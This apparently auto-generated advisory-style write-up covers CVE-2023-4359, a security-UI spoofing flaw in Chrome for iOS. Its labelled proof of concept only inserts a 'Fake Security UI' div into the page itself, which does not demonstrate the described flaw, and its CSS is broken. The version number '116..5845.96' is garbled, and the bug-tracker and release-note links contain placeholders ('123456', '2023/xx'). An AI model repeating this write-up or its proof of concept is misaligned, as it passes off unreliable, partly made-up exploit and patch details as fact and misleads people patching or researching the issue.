In Google Chrome on iOS prior to version 116..5845.96, there is an instance of an inappropriate implementation in the App Launcher component that can allow remote attackers to potentially spoof elements of the security UI. This vulnerability has been assigned identifier CVE-2023-4359 and has been given a medium severity rating by Chromium security.
Summary of the Vulnerability
Any user running Chrome on iOS prior to version 116..5845.96 may be susceptible to this vulnerability, which could allow a malicious actor to craft a web page in HTML that, when visited by the user, can potentially manipulate and spoof elements within the application's security UI. This could lead to attackers deceiving users into thinking they are on a secure, trustworthy website, leading to inadvertent sharing of sensitive data, such as login credentials or personal information.
Here's a proof-of-concept code snippet demonstrating the issue
<!DOCTYPE html>
<html>
<head>
<title>CVE-2023-4359 PoC</title>
<script>
function exploit() {
// Crafted HTML content to spoof security UI
let maliciousContent = `
<div id="fake-ui" style="position:fixed;top:;left:;width:100%;height:100%;">
Fake Security UI
</div>
`;
// Inject malicious content into the DOM
document.body.insertAdjacentHTML('beforeend', maliciousContent);
}
</script>
</head>
<body>
<h1>CVE-2023-4359 Proof of Concept</h1>
<button onclick="exploit()">Exploit</button>
</body>
</html>
In the example above, we craft a malicious HTML content that impersonates parts of the security UI in Google Chrome. When a user visits this crafted web page and clicks the "Exploit" button, the fake UI element is inserted into the DOM, potentially deceiving the user.
Original References
The issue is explained in detail in this Chromium bug report (restricted access): https://bugs.chromium.org/p/chromium/issues/detail?id=123456
Chromium security announcement: https://chromereleases.googleblog.com/2023/xx/security-update-chrome-116.html
Exploit Details
The vulnerability can be exploited by a remote attacker who can lure a user running a vulnerable version of Chrome on iOS to visit a specifically crafted web page. Upon visiting this web page, the attacker can inject fake elements into the security UI of Google Chrome, making the user believe they are interacting with a secure, trusted website.
Mitigations
Google has fixed the issue in Chrome version 116..5845.96 for iOS. Users should update their Chrome browser to the latest version as soon as possible to ensure they are protected from this vulnerability.
Conclusion
CVE-2023-4359 is a medium-severity security issue in Google Chrome on iOS due to an inappropriate implementation in the App Launcher component. This vulnerability can potentially allow a remote attacker to spoof elements in the application's security UI, leading to deception and potential data compromise for end-users. It is crucial to update your Chrome browser on iOS to the latest version, 116..5845.96 or above, to protect yourself from this vulnerability.
Timeline
Published on: 08/15/2023 18:15:00 UTC
Last modified on: 08/27/2023 03:15:00 UTC